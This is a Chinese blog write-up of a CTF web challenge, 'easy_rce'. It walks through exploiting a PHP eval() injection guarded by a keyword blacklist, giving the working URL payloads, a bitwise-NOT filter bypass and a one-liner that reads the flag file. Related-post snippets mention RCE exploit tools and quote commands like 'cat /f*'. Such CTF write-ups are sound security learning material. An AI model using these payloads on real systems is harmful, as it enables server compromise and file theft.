【GXUCTF】easy_rce

最新推荐文章于 2024-04-15 02:22:22 发布
最新推荐文章于 2024-04-15 02:22:22 发布
阅读量752 收藏 2
点赞数
分类专栏: 笔记 文章标签: php unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51572769/article/details/120681638
版权

讲一下我的解题过程,期间碰壁无数,值得写(shui)一篇wp~

页面代码:

<?php

header("Content-type: text/html; charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);

# hint:flag在/flag里~

if(isset($_GET['bypass'])){
    $bypass = $_GET['bypass'];
    if(!preg_match("/flag|system|exec|passthru|file_get_content|show_source|include|highlight_file|require|shell_exec|escapeshellarg|escapeshellcmd|proc_close|proc_get_status|proc_nice|proc_open|proc_terminate/i", $bypass)){
        eval($bypass);
    }else{
        echo "no no,don't hack me~";
    }
    
}

观察代码需要GET一个bypass,然后bypass会被传入eval() 函数
百度到eval() 可以把括号里的字符串当作php代码运行
官方文档PHP: eval - Manual

到目前为止,我们知道了可以直接给bypass赋值,让网页运行我们自己的代码:

http://120.24.194.57:3700/index.php?bypass=print("keqingwolaopo");

哎?居然没成功?
没事,后边加俩//

http://120.24.194.57:3700/index.php?bypass=print("keqingwolaopo");//

就ok了,可是为啥捏?(老实说,我不知道。我是参考的这个:https://blog.csdn.net/qq_26187985/article/details/89045575

然后;

http://120.24.194.57:3700/index.php?bypass=print_r(scandir("./"));//

这里的 print_r 可以直接按一定格式输出array,scandir可以返回一个array,array保存了给定目录下所有文件和文件夹的名字。输出结果:
在这里插入图片描述
感觉似乎和flag没啥关系,往父级目录走试试看:

http://120.24.194.57:3700/index.php?bypass=print_r(scandir("../"));//

在这里插入图片描述

flag它终于出现了,继续——

http://120.24.194.57:3700/index.php?bypass=print_r(scandir("../flag"));//

在这里插入图片描述
啊哈,这下触发页面代码里的else部分了,因为咱们给bypass的赋值包含”flag“这一个字符串(详情请看PHP preg_match函数文档
所以我们需要绕过preg_match函数,经过艰难的百度,我找到的合适的绕过方法:
方法一:

<?php print(urlencode(~'flag'));?>

可以生成字符串 “%99%93%9E%98”
然后可以用urlencode(~"%99%93%9E%98" ) 表示 “flag”

方法二:
直接用前面生成的文件名数组scandir("../")[9]

最后:

$g=scandir("../")[9];			//把字符串”flag“赋值给一个变量
$f==fopen("../$g","r");			//打开flag文件
while (!feof($f))				//读取flag文件
{
    echo fgetc($f);
}

接着把上面代码写成一行通过GET方式传给bypass:

http://120.24.194.57:3700/index.php?bypass=$g=scandir("../")[9];$f=fopen("../$g","r");while(!feof($f)){echo fgetc($f);}//

拿到flag:
在这里插入图片描述

Wayage
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
TDOA_RCE:通达OA综合利用工具
03-03
工具说明 通达OA综合利用工具_20210224 集成POC如下 任意用户登录POC:4个SQL注入POC:2个后台文件上传POC:3个本地文件包含POC:2个前台文件上传POC(非WEB目录):1个任意文件删除POC:1个 工具面板截图 ...
easy_rce 解析
qq_73722777的博客
03-04 408
使用cat命令打开flag文件,发现cat命令被屏蔽,我们尝试使用tac命令配合/查看flag。此时,看见地址可以尝试使用在地址后面加上;进行封闭并执行后面的语句。输入后没有反应,初步推测是语句被屏蔽。此时我们使用ls /进行根目录查询。打开网页,可以看见一个输入框。我们尝试使用|进行屏蔽脱离。这里使用ls尝试查看文件。得到flag,此题结束。
[SWPUCTF 2021 新生赛]easyrce-解题思路
m0_73734159的博客
07-21 892
isset函数用来检测url变量是否存在;$_GET函数获取变量数据#eval函数用来执行参数数据,并返回结果,其中字符串当作PHP代码来执行。重要代码段为一中的第3点,我们用来侧重分析。
Catf1agCTF-Web通关合集(1),2024年最新源码解读-别再说你不知道HashMap原理
最新发布
2401_83946509的博客
04-15 770
一般的md5绕过是传入0e开头的md5值,因为在弱比较时,弱比较中会截取一个字符串的数字,知道遇到字符截止,对于0e+数字的值只会截取e之前的0,所以这里即便是令传入的md5值等于$md5后还需要等于其自身进行md5的值,我们选取0e或者加密后仍为0e开头的数就行例如:0e215962017 、以及这些纯字符串转化后为0e+数字的数:QNKCDZO、s878926199a。如果你能答对70%,找一个安全工作,问题不大。这里明确说明,在两个相等的符号中,一个字符串与一个数字相比较时,字符串会转换成数值。
中学生CTF平台 Easy RCE write up
Ju0se
04-05 2917
题目地址:http://ctf.klmyssn.com/challenges#Easy RCE http://198.13.45.199:5006/ 查看一下源代码 果断向name传值。 报错,发现eval函数。 然后来看一下题目的hint。哦~果然如我所想的。后面被拼接了三个!,就是为了阻止你正常的执行。 破解方法很简单。加入//进行注释。 成功执行...
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度进行分类
SMBGhost_RCE_PoC-master.zip
06-11
标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行(RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
SMBGhost_RCE_PoC
03-18
SMBGhost_RCE_PoC CVE-2020-0796“ SMBGhost”的RCE PoC 仅用于演示目的!仅将此用作参考。严重地。这尚未在我的实验室环境之外进行过测试。它写得很快,需要做一些工作才能更可靠。有时你会蓝屏。除了自我教育以外...
shiro_rce_tool:shiro rce tool 反序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --&...
11.14[SWPUCTF 2021 新生赛]easyrce已解决题目
plm20030621的博客
11-14 74
第一步, 看到get 传参优先是想到一些get 传参的用法,但在这里,依旧涉及Liunx的一些操作指令,第二步,使用ls 命令去查看当前下有那些文件,做到这里,你已经成功一半了。第三步,cat 查询的命令 得到flag值。用于打印当前有效的用户名称,相当于执行。先用此命令查看自己的用户和权限。
网安入门20——RCE(命令执行Ping)
m0_61499194的博客
10-02 865
源码分析:源代码中先对操作系统进行校验,如果是Windos默认ping4次,Linux系统则是现需要手动设置发包次数,传入的ip未作处理,直接拼接到系统命令中,未作任何处理,最后用shell_exec()执行命令,与system()命令类似,可以直接执行系统层面命令。这种漏洞可能导致严重的安全问题,因此开发人员需要采取适当的防御措施来防止命令执行漏洞的发生。为了防止命令执行漏洞,开发人员应该对用户输入进行严格的验证和过滤,确保输入的数据符合预期的格式和范围。命令执行是在目标服务器上任意执行系统命令。
山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(八)-RCE漏洞
m0_47470899的博客
03-23 4443
目录前言:1、RCE 漏洞简介1.1、简介1.2、危害1.3、利用1.3.1、漏洞挖掘1.3.2、windows下管道符1.3.3、linux下管道符1.4、防范2、相关配置3、编写“RCE 漏洞”后端代码4、编写“RCE 漏洞”前端代码5、运行测试参考文章 前言: 1、RCE 漏洞简介 1.1、简介 RCE (Remote Code/Command Execute) :远程代码/命令执行 漏洞产生原因:在 Web 应用中开发者为了灵活性,简洁性等会让应用调用代码或者系统命令执行函数去处理,同时没有考虑用
[SWPUCTF 2021 新生赛]easyrce
qq_62046696的博客
05-09 3128
打开题以后发现这个界面,需要构造url的值,然后就想起来看一下目录 ?url=system("ls /");注意:ls后面要有一个空格,然后一个分号结束,这不就出来了flag 1: ?url=system("cat /f*"); 2\?url=system("cat /flllllaaaaaaggggggg"); [SWPUCTF 2021 新生赛]easy_sql 打开界面属实给我整不会了。 1.然后测一下是否存在sql漏洞,因为题目中说了参数是wllm,首先输入一下?wll...
【CTF】命令执行RCE
qq_53099119的博客
04-02 2616
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
RCE漏洞基础及CTF绕过
qq_61988806的博客
12-15 507
对于两个二进制位,如果相应位相同则结果为 0,如果相应位不同则结果为 1。
BUUCTF [羊城杯 2020]easyre 题解
OrientalGlass的博客
03-08 971
对数字和字母移三位,其他特殊字符不变,要求出加密前的字符串,只需要对数字+7再mod10,对字母+23再mod26,有点补码的感觉在。看到主函数的str2大概就可以猜到是base64,ctrl+f12也可以看到存在base64表。进入该函数后大概看一下不难发现是base64加密并且这题没有换表操作。第三次加密是将code2内的数字和字母移3位,其他字符不变。第一次加密是base64加密,得到code1。三.encode_one_base64。五.encode_three。四.encode_two。
攻防世界php_rce
08-26
攻防世界中的php_rce是指一种利用PHP解释器的远程代码执行漏洞进行攻击和防御的技术。这种漏洞可以允许攻击者将恶意的PHP代码注入到服务器上,并执行任意命令。引用中的payload是构造了一个用于执行"ls /flag"命令的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值